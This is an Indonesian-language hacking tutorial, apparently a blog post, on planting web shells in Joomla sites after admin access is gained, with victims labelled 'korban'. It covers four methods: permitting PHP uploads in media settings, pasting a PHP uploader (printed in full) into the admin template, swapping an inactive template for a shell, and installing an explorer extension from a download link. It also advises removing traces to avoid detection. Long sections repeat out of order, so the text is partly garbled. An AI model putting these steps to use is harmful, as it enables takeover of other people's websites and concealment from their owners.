kali ini ane mo share sdikit bbrpa trik buat upload shell di CMS joomla. mungkin udah pada tau yaa..
okedeh, langsung ke tutorialnya aja.
pertama, yang pasti udah dapet akses ke admin panel joomla nya. ane ga bahas gimana cara dapetin akses admin nya. entah SQLi, jumping, symlink, ,etc.
CARA 1
masuk ke menu site > global configuration. trus klik bagian system
perhatikan bagian media setting,
trus di sub bagian
[+]Legal Extensions (File Types) kita tambahkan ekstensi php kedalamnya
[+]Restrict Uploads --> pilih NO
[+]Check MIME Types --> pilih NO
[+]Legal Image Extensions (File Types) kita tambahkan ekstensi php kedalamnya
[+]Legal MIME Types --> tambahin image/php
klo udah save. stelah itu..
pergi ke media manager (site > media manager) upload shellnya disitu.
lalu upload deh shellnya
udah ke upload :D , lokasi shell ada di http://korban.com/images/namashell.php
Klik menu Extension > template manager
klo udah. save aja.
sukses. dan uploader kita udah nongol dibawah :) tinggal kita upload shell kita.
kita ke extension > template manager. kali ini kita edit template site nya. tp bukan yg sedang dipakai. (klo yg template admin td kan nyari template yg lg aktif)
skrng kita pilih template site yg sedang tidak aktif. (tanda kalo template itu aktif, ada tanda bintangnya)
klik aja nama template yg ga aktif. misal: beez
trus pilih edit html. klo udah muncul editornya, langsung dah kita replace dengan script shell kita
lalu browse dan pilih ninja xploler jika belum punya ninja xploler silahkan download --> https://dl.dropboxusercontent.com/s/785a2ubx17szvqw/ninja%28www.cybersquads.com.blogspot.com%29.zip?token_hash=AAF-w0uvyuORJauef38TLlOSrCP3p92ysnxgwRMb9AgdWg&dl=1
setelah selesai intall lalu pilih components > ninja xplorer
setelah itu tentukan letak upload shellnya disini saya letakkan pada folder logs lalu klik upload
setelah itu eksekusi shellnya pada http://target.com/logs/namashell.php
sekarang kalian sudah take over webnya
tinggal ubah sesuai keinginan kalian
kalau tidak bisa karna joomla telah di update dari cms yang lama ke yang baru bisa gunakan cara ini
pertama masuk content > media manager > option
setelah itu tambahkan extension php pada legal extension , legal image extension
setelah itu save and exit
lalu cobalah upload shell backdoor anda
dan berhasil kita upload shell backdoor kita pada web
hmmhh.. baru segitu cara ane,
mari diskusi disini, cara cara yg laennya. yang punya trik laen (kalo mau sih) share juga dimari.
okedeh, langsung ke tutorialnya aja.
pertama, yang pasti udah dapet akses ke admin panel joomla nya. ane ga bahas gimana cara dapetin akses admin nya. entah SQLi, jumping, symlink, ,etc.
CARA 1
masuk ke menu site > global configuration. trus klik bagian system
perhatikan bagian media setting,
trus di sub bagian
[+]Legal Extensions (File Types) kita tambahkan ekstensi php kedalamnya
[+]Restrict Uploads --> pilih NO
[+]Check MIME Types --> pilih NO
[+]Legal Image Extensions (File Types) kita tambahkan ekstensi php kedalamnya
[+]Legal MIME Types --> tambahin image/php
klo udah save. stelah itu..
pergi ke media manager (site > media manager) upload shellnya disitu.
lalu upload deh shellnya
udah ke upload :D , lokasi shell ada di http://korban.com/images/namashell.php
CARA 2
secara konsep sih sama, disni ane dpetnya joomla versi 1.5.18 , klo versi yg laen.. silakan menyesuaikan. :pKlik menu Extension > template manager
trus pergi di bagian administrator.
kemudian seleksi nama template admin yg aktif, trus klik edit. klo udah pilih lagi edit html.
kan udah muncul tuh editornya, tinggal kita sisipin aja uploader.
buat yg belom punya uploader, bisa di copy script di bawahmari kita sisipin uploadernya, taro dibawah </body> aja.<?php
echo '<b>www.cybersquads.com uploader</b>';
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES Dab!!!</b><br><br>'; }
else { echo '<b>JANCOOK !!! Upload GAGAL !!!</b><br><br>'; }
}
?>
klo udah. save aja.
sukses. dan uploader kita udah nongol dibawah :) tinggal kita upload shell kita.
setelah upload shell, kita coba akses shell kita. letak file yg udah di upload, itu ada di http://korban.com/administrator/namashell.php
*kalo ane : biasanya ane balikin lg template admin td ke semula, yg ga ada uploadernya. ane remove lg script uploadernya. biar ga ketauan.
:) CARA 3
masi dlm masalah edit mengedit template. kali ini kita pake cara edit template yg laen.kita ke extension > template manager. kali ini kita edit template site nya. tp bukan yg sedang dipakai. (klo yg template admin td kan nyari template yg lg aktif)
skrng kita pilih template site yg sedang tidak aktif. (tanda kalo template itu aktif, ada tanda bintangnya)
klik aja nama template yg ga aktif. misal: beez
trus pilih edit html. klo udah muncul editornya, langsung dah kita replace dengan script shell kita
klo udah silakan disave. nah.. skrng kita coba menuju shell kita.
letak posisi shell uda ane jelasin di gambar diatas. yaitu : http://korban.com/templates/beez/index.phpCARA 4
jika joomla compatibble dengan ninja xploler coba intall saja dengan cara masuk ke extension > instal/unintsal
setelah selesai intall lalu pilih components > ninja xplorer
setelah itu tentukan letak upload shellnya disini saya letakkan pada folder logs lalu klik upload
setelah itu eksekusi shellnya pada http://target.com/logs/namashell.php
sekarang kalian sudah take over webnya
tinggal ubah sesuai keinginan kalian
kalau tidak bisa karna joomla telah di update dari cms yang lama ke yang baru bisa gunakan cara ini
pertama masuk content > media manager > option
setelah itu tambahkan extension php pada legal extension , legal image extension
setelah itu save and exit
lalu cobalah upload shell backdoor anda
dan berhasil kita upload shell backdoor kita pada web
hmmhh.. baru segitu cara ane,
mari diskusi disini, cara cara yg laennya. yang punya trik laen (kalo mau sih) share juga dimari.
Post a Comment